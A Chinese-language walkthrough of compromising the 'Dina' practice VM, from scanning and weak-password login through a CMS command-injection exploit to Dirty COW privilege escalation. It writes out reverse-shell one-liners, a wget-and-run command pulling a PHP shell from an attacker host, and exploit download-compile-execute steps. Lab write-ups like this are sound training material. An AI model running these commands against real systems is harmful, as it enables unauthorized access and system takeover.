Dina靶机渗透

挺有意思的一个靶机

目录

主机发现

端口扫描

目录扫描

去web端看看,开始渗透

反弹shell

方法1

方法2

提权

尝试1-失败

尝试2-脏牛提权-成功


主机发现

Dina靶机渗透

netdiscover -i eth0 -r 192.168.129.0/24

Dina靶机渗透

端口扫描

Dina靶机渗透

扫描端口的服务版本,服务器操作系统,中间件等信息

Dina靶机渗透

目录扫描

Dina靶机渗透

去web端看看,开始渗透

Dina靶机渗透

看了看页面也没啥有用信息

一个提交信息

Dina靶机渗透

只是爆出服务器中间件版本然后也不能操作什么

还有一个链接跳转到了一个印度人的博客里,里面有他的漏洞发现过程,我们不看^-^

Dina靶机渗透

来访问一下目录扫描出来的结果

http://192.168.129.201/robots.txt

http://192.168.129.201/secure/

http://192.168.129.201/tmp/

http://192.168.129.201/uploads/

Dina靶机渗透

Dina靶机渗透

点了下发现点不进去,拖到新页面也没有啥

最后我将那个后缀去掉在访问 直接触发了下载

Dina靶机渗透

下来要解压,里面有一个 .mp3文件,但是要解压密码,先放着

Dina靶机渗透

Dina靶机渗透

Dina靶机渗透

Dina靶机渗透

robots.txt里的几个也都进去后没发现什么

然后换了个kali2021的dirb

Dina靶机渗透

最后发现这里有些信息

好像是什么密码之类的,但是也还没有找到啥子登录框

Dina靶机渗透

现在只剩那个下载的加密文件了

刚好这里爆出了几个密码,去试试

freedom password helloworld! diana iloveroot

结果第一个就成功了

Dina靶机渗透

编辑打开里面的.mp3 文件,找到了一些内容

Dina靶机渗透

访问一下这个url,看名字像是个登陆点

直接跳转过来了

Dina靶机渗透

里面那句话,这个人设的密码应该是弱口令

Dina靶机渗透

来用.mp3 里的uname登陆下,密码使用那个网页找到的那几个

freedom password helloworld! diana iloveroot

然后使用diana登陆上来了

Dina靶机渗透

随便点了几下,发现这里有几个下载

Dina靶机渗透

Dina靶机渗透

Dina靶机渗透

结果啥也不是,浪费流量

然后在这发现了一个上传点

Dina靶机渗透

然后上传了一个图片马,不知道上传到哪里了

Dina靶机渗透

这时想到了能不能去搜一下这个cms有什么版本漏洞

Dina靶机渗透

看见这个 42044 里有远程命令执行漏洞

查看

让插入代码到电话簿里

Dina靶机渗透

Dina靶机渗透

Dina靶机渗透

想到了刚才下的几个空文件,有个phonebook,直接有格式了

直接改它

Dina靶机渗透

Dina靶机渗透

改好后import进去

Dina靶机渗透

同时抓包

Dina靶机渗透

在user-agent里执行命令,,命令执行成功

Dina靶机渗透

反弹shell

方法1

在kali下做如下准备

&3 2>&3") ?>

Dina靶机渗透

再监听1234

Dina靶机渗透

远程执行如下代码

wget 192.168.129.197/shell.txt -O /tmp/shell.php;php /tmp/shell.php

Dina靶机渗透

getshell

Dina靶机渗透

方法2

php -r '$sock=fsockopen("192.168.129.197",1234);exec("/bin/sh -i &3 2>&3");'

Dina靶机渗透

getshell

Dina靶机渗透

提权

尝试1-失败

查看内核版本

Dina靶机渗透

搜索操作系统版本漏洞

本地提权

Dina靶机渗透

复制到网站根目录

Dina靶机渗透

远程下载,编译,执行

结果失败了

Dina靶机渗透

尝试2-脏牛提权-成功

下载,编译,执行

wget http://192.168.129.197/dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

./dirty root (root是随便给个密码,一会自己用)

Dina靶机渗透

然后登陆自己的用户,此时,这个用户已经是管理员了

用python开一个新窗口

登陆成功,#

Dina靶机渗透

看,以前的root已经被覆盖掉了

Dina靶机渗透

渗透完成后,要恢复

mv /tmp/passwd.bak /etc/passwd

明显不一样了,,只是前一个用户也叫firefart,,密码恢复为他的了

Dina靶机渗透

得到flag

Dina靶机渗透

上一篇:CreateProcess error=2, 系统找不到指定的文件 pycharm运行错误


下一篇:09 _ map:如何实现线程安全的map类型?